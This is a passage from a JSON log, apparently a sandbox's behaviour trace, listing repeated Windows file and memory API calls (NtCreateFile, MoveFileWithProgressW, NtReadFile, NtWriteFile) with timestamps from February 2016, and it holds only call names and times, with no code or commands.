"timestamp": "2016-02-16 17:41:40,941", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,951", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,951", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,961", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,961", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,961", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,961", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,961", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,961", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,961", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,971", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,971", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:40,971", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,971", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,971", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,981", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,981", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,991", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,991", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,991", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,991", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,991", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:40,991", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,991", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:40,991", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,001", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,001", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,001", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,001", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,001", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,001", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,001", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,061", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,061", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,061", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,061", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,061", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,061", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,061", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,071", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,071", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,071", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,071", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,071", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,071", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,071", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,081", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,081", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,081", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,081", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,081", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,081", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,081", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,081", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,091", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,091", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,101", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:41,101", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,101", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,101", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,101", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,101", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,101", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,101", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,111", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,111", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,111", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,111", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,111", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,111", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,111", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,121", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,121", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,131", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,131", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,131", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,131", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,131", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,131", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,131", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,141", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,141", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,141", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,141", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,141", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,141", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,141", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,151", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,151", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:41,151", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,151", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,151", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,161", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,161", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,161", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,161", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,161", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,161", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,161", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,171", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,171", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,171", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,171", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,171", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,171", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,171", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,181", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,181", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,181", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:41,181", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,181", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,181", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,181", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,191", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,191", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,191", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,191", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,191", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,191", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,191", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,201", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,201", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,201", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,201", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,201", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,201", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,201", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,201", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,211", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,211", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,211", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,211", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,211", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,211", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,211", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,211", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,221", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,221", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,221", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,221", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,221", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,221", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,221", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,221", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,221", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,231", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,231", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,231", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,231", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,231", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,231", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,231", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:41,241", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,241", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,241", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,241", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,241", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,241", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,251", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,251", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,251", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,251", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,251", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,251", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,261", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:41,261", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,271", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,271", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,271", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,271", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,271", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,271", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,282", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,282", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,292", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:41,292", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,292", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,302", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,302", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,312", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,312", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,312", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,312", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,312", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,322", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:41,322", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,322", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,322", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,332", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,332", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,342", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,342", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,342", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,352", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,352", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,352", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,352", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,362", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,402", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,402", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,402", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,402", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,402", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,402", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,412", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,412", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,412", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,412", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,422", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,422", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,422", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,422", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,422", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,422", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,432", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,432", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,432", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,432", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,432", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,432", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,432", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,442", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,442", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,442", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,442", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,442", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,442", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,452", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,452", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,452", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,452", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:41,452", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,452", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,462", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,462", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,462", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,462", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:41,462", "api": "NtWriteFile"}, 